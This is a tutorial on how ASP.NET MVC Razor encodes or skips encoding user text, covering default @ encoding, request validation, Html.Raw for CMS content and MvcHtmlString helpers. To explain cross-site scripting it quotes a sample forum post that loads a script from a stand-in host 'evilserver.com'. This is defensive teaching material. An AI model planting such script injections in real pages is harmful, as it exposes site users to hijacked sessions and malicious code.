Activity: Understanding Text Encoding in ASP.NET MVC

This article by Michael Kennedy explores how Razor treats text data that may contain HTML or script, sometimes malicious, sometimes benign.

In some situations, we want to make the HTML part of our page. An example of this might be a CMS editor backend. This requires one type of syntax.

In other situations, we want to ensure that we do not allow the HTML into our page but rather we HTML encode it to make it safe. An example here might be the comments section of a blog app. This requires a different type of Razor syntax.

There are other scenarios as well. Michael's article demonstrates the various options you have in MVC and Razor for dealing with this.

Note: The code for this article is available on GitHub if you want to look behind the scenes.

================================================================

This article covers the various ways you might handle text encoding in ASP.NET MVC. If you are writing a forum web app, for instance, you should absolutely be paranoid about what your users type into your site, and very careful about how you redisplay their input. A friendly forum user might write something like:

Nice post, thanks for sharing!

On the other hand, they may write:

<script src="http://evilserver.com/xss.js"></script>
<script>xss.doBadDeeds();</script>

If you turn around and show this “post” to your other users, maybe they’ll get hacked. At a minimum, the evil-doers could be a nuisance to your real users.

On the other hand, if you're building a CMS or utility helper method, you do not want to filter out the HTML a user might type. They probably need to enter some HTML which you'll want to show to all the other users. Same thing goes for code your app might generate.

There are at least three ways in which MVC manages and encodes (or does not encode) text data. Knowing which scenario you’re targeting allows you to choose the right option. We’ll look at four examples in this post:

  1. A forum app which can be hacked
  2. A forum app which is safe from XSS injection
  3. A CMS app with rich text editing
  4. Generating HTML in code for use in MVC Razor views

Protecting Against Unwanted HTML Inputs

First, the good news. MVC protects you in several ways against HTML / JS injection issues. When you write out a string in a Razor view with @, as in @commentText, it is HTML-encoded by default.
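The snippet this paragraph refers to is not reproduced in this copy. As a minimal sketch, assuming commentText is a string declared in the view itself (a hypothetical setup; a real view would more likely read it from the model), such a view might look like this:

```cshtml
@{
    // Assumption: hard-coded for illustration. In a real app this value
    // would come from the model or the database.
    string commentText = "<script src='evil.js'></script>";
}

@* The at-sign prefix HTML-encodes the string before it is written out. *@
<div>Comment text: @commentText</div>
```

Because the value is encoded on output, the browser displays the markup as text instead of running it.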

If we assume commentText = "<script src='evil.js'></script>", then the output would simply be:

Comment text: <script src='evil.js'></script>

That is &lt;script src='evil.js'&gt;&lt;/script&gt; in view source, which is perfectly safe.

Next, it is unlikely that this input ever makes it to your site. By default, if you have an action method taking this input, it will just error out with the following message:

Error on submit:

A potentially dangerous Request.Form value was detected from the client…

Of course, we could disable this with a ValidateInput attribute:
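The original code listing is missing from this copy. The following is a sketch only, with a hypothetical controller name (ForumController) and action name (AddComment); the ValidateInput attribute itself is the real one from System.Web.Mvc:

```csharp
using System.Web.Mvc;

// Hypothetical controller and action names, for illustration only.
public class ForumController : Controller
{
    [HttpPost]
    [ValidateInput(false)] // turns off request validation for this action only
    public ActionResult AddComment(string commentText)
    {
        // commentText may now contain raw HTML or script.
        // Nothing here sanitizes it, so every view that displays it
        // must rely on the default encoding of @ output.
        ViewBag.CommentText = commentText;
        return View();
    }
}
```

Applying the attribute to a single action, rather than disabling validation site-wide, keeps the unvalidated surface as small as possible.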

In this case, you must be VERY careful when you write out the commentText values later.

So far we have seen that by default Razor outputs text in a safe way using @value. Also, POST requests with dangerous content are blocked unless you explicitly allow them through.

In order to demonstrate these concepts, I created a working sample app here:

http://text-encoding-aspnet-mvc-by-example.azurewebsites.net/

View the safe forum and unsafe forum sections to see what happens. You can download the code from the sample as well.

Allowing Direct HTML Inputs

But what if you trust the input and need MVC out of the way so you can write true HTML content to the browser? One such example might be a CMS you’re writing. There are two cases you would treat differently here. Is your HTML coming from data given to your view or from code called by your view?

Let’s assume it’s handed to you as a string in a variable called cmsSectionData (i.e. data). Then we can use the helper method:

@Html.Raw(cmsSectionData)

rather than @cmsSectionData. This will make the contents of cmsSectionData part of your HTML in the view. You will also need to disable validation on any edit pages using [ValidateInput(false)] as shown above.
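To make the difference concrete, here is a small side-by-side sketch. The content of cmsSectionData is made up for illustration, and it is hard-coded only to keep the example short:

```cshtml
@{
    // Assumption: a real CMS would load this from storage.
    string cmsSectionData = "<h2>Welcome</h2><p>Edited in the <em>CMS</em>.</p>";
}

@* Encoded: the reader sees the tags as literal text. *@
<div>@cmsSectionData</div>

@* Raw: the tags become part of the page's HTML. *@
<div>@Html.Raw(cmsSectionData)</div>
```

Only use the raw form for content you trust, since it bypasses the protection described earlier.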

Check out the CMS section of the demo to see it in action.

Finally, if you are writing little helper methods to make your views cleaner (a good idea!), you’ll do something totally different. For example, suppose we frequently need to wrap images in links in our views. We could write it out in HTML each time, or we could write a method called LinkWithImage on a class of our own called OurHtmlHelper. Here is an example implementation:
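The original listing is not included in this copy, so what follows is a guess at its shape rather than the author's code. It assumes the helper takes a link URL and an image URL (hypothetical parameter names) and returns the markup as a plain string:

```csharp
using System.Web;

// Hypothetical reconstruction of the helper described above.
public static class OurHtmlHelper
{
    // Returns the markup as a plain string, which Razor treats as text.
    public static string LinkWithImage(string linkUrl, string imageUrl)
    {
        // Attribute-encode the URLs so they cannot break out of the quotes.
        return string.Format(
            "<a href=\"{0}\"><img src=\"{1}\" /></a>",
            HttpUtility.HtmlAttributeEncode(linkUrl),
            HttpUtility.HtmlAttributeEncode(imageUrl));
    }
}
```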

You might think we could write code like this:
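The view code is also missing here. Presumably it was a direct call along these lines, where the URLs are placeholders and OurHtmlHelper is assumed to be reachable from the view (for example through a using directive for its namespace):

```cshtml
@* Assumes LinkWithImage returns a plain string. *@
@OurHtmlHelper.LinkWithImage("http://example.com/", "/images/logo.png")
```

With a string return type, the visitor would see the anchor and image tags printed as text instead of a clickable image.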

But MVC’s encoding for @ would block it for sure. You could wrap it in an @Html.Raw() but there is a better way.

Introducing the MvcHtmlString class

The purpose of this class is to inform MVC to get out of the way and NOT encode the contents. So simply changing the return type of LinkWithImage to MvcHtmlString fixes it.
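A minimal sketch of the helper with the changed return type, assuming LinkWithImage takes a link URL and an image URL (the parameter names are hypothetical; MvcHtmlString.Create is the real factory method in System.Web.Mvc):

```csharp
using System.Web;
using System.Web.Mvc;

// Hypothetical helper class; only the return type matters for this example.
public static class OurHtmlHelper
{
    public static MvcHtmlString LinkWithImage(string linkUrl, string imageUrl)
    {
        // We are now responsible for encoding, so encode the attribute values.
        string html = string.Format(
            "<a href=\"{0}\"><img src=\"{1}\" /></a>",
            HttpUtility.HtmlAttributeEncode(linkUrl),
            HttpUtility.HtmlAttributeEncode(imageUrl));

        // Wrapping the markup tells Razor not to encode it again.
        return MvcHtmlString.Create(html);
    }
}
```

A view can then call @OurHtmlHelper.LinkWithImage(...) directly, with no Html.Raw wrapper. The trade-off is that the helper, not Razor, must now encode any untrusted values it embeds.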

Check out the Helpers section of the demo to see this in action.

There you have it. Three ways to encode or avoid encoding HTML data in ASP.NET MVC applications.
